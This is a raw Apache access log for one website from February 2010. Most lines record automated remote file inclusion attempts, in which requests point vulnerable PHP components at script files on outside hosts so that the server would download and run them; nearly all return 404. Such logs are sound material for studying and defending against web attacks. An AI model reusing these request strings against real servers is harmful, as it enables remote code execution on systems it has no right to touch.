61.63.82.14 - - [15/Feb/2010:05:39:04 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:39:04 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:39:07 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:39:27 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:39:27 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:39:32 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:36 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:36 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:36 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:37 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:37 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:37 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:39:47 -0800] "GET /logs/access_100210.log%20%20/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:49 -0800] "GET /logs/access_100116.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:39:50 -0800] "GET /logs/access_100116.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:39:59 -0800] "GET /logs/access_100210.log%20%20/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:40:23 -0800] "GET /logs/access_100129.log/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:40:41 -0800] "GET /logs/access_100125.log%20%20/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:40:51 -0800] "GET /logs/access_100125.log%20%20/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:41:04 -0800] "GET /logs//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:41:04 -0800] "GET /logs/access_100210.log%20%20//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:41:05 -0800] "GET /bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:15 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:15 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:15 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:41:30 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php///inctech2/bbs/write_comment_update.php//write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:41:51 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:54 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:55 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:55 -0800] "GET /logs/access_100202.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:41:58 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:42:49 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:42:49 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:42:49 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:43:16 -0800] "GET /logs/access_100128.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [15/Feb/2010:05:44:36 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [15/Feb/2010:05:44:36 -0800] "GET /logs/access_100112.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [15/Feb/2010:05:44:36 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:44:39 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:47:28 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:47:28 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:47:28 -0800] "GET /logs/access_100112.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:48:03 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:48:05 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:48:05 -0800] "GET /logs/access_100129.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:48:05 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:48:20 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:48:30 -0800] "GET /logs/access_100201.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:48:48 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.252.131 - - [15/Feb/2010:05:48:57 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/auto1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:49:00 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:49:00 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:49:01 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:49:24 -0800] "GET /logs/access_100128.log%20%20///bbs/delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:49:55 -0800] "GET /logs/access_100115.log//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.252.131 - - [15/Feb/2010:05:50:12 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/auto1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:50:21 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.252.131 - - [15/Feb/2010:05:50:35 -0800] "GET /logs/access_100121.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/auto1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:50:38 -0800] "GET /logs/access_100204.log//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:05:51:01 -0800] "GET /logs/access_100120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:05:51:14 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:51:24 -0800] "GET /logs/access_100129.log/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:51:24 -0800] "GET /logs/access_100201.log/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:52:51 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:52:51 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:52:51 -0800] "GET /logs/access_100129.log%20%20/home//conlib/local.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.14.52 - - [15/Feb/2010:05:53:21 -0800] "GET /logs/access_100112.log//skin/uks_gallery_v3010/write.php?dir=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:53:54 -0800] "GET /logs/access_100107.log//admin.cropcanvas.php?cropimagedir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:53:54 -0800] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:53:56 -0800] "GET /logs/access_100203.log//admin.cropcanvas.php?cropimagedir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:55:37 -0800] "GET /port.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:55:37 -0800] "GET /logs//port.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:55:38 -0800] "GET /logs//port.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:55:38 -0800] "GET /port.php?content=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:56:10 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:56:10 -0800] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:56:10 -0800] "GET /logs/access.log%20%20///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:56:12 -0800] "GET /logs/access_100203.log%20%20//admin.cropcanvas.php?cropimagedir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:56:28 -0800] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:56:28 -0800] "GET /logs/access.log%20%20///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:56:28 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:57:03 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:05:57:03 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:57:14 -0800] "GET /logs/access_100201.log//accounts/inc/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:57:16 -0800] "GET /logs/access.log///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:57:16 -0800] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.217.248.142 - - [15/Feb/2010:05:57:17 -0800] "GET /ideal/forum/posting.php?mode=reply&t=11351 HTTP/1.1" 404 5258 "http://www.puaga.com/ideal/forum/posting.php?mode=reply&t=11351" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" "www.puaga.com"
87.118.96.104 - - [15/Feb/2010:05:57:23 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:59:54 -0800] "GET /logs/access_100112.log%20%20///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:01:43 -0800] "GET /logs/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:01:43 -0800] "GET /write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:01:43 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:06:01:43 -0800] "GET /logs/?sourcedir=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:06:01:43 -0800] "GET /logs/access_100117.log%20%20/?sourcedir=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:06:01:44 -0800] "GET /?sourcedir=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:06:02:30 -0800] "GET /logs/access_100122.log%20%20/?sourcedir=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:02:52 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:02:52 -0800] "GET /logs/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:06:02:52 -0800] "GET /write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:07:38 -0800] "GET /write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:07:38 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:06:07:38 -0800] "GET /logs/write_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:06:07:52 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.steklo-vsem.ru/webalizer/.../main_products/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:06:07:52 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.steklo-vsem.ru/webalizer/.../main_products/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:06:08:06 -0800] "GET /accounts/inc/errors.php?error=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:06:08:06 -0800] "GET /logs//accounts/inc/errors.php?error=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:06:08:06 -0800] "GET /logs/access_100107.log%20%20//accounts/inc/errors.php?error=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:22 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:22 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:22 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:29 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:29 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:29 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:12:30 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
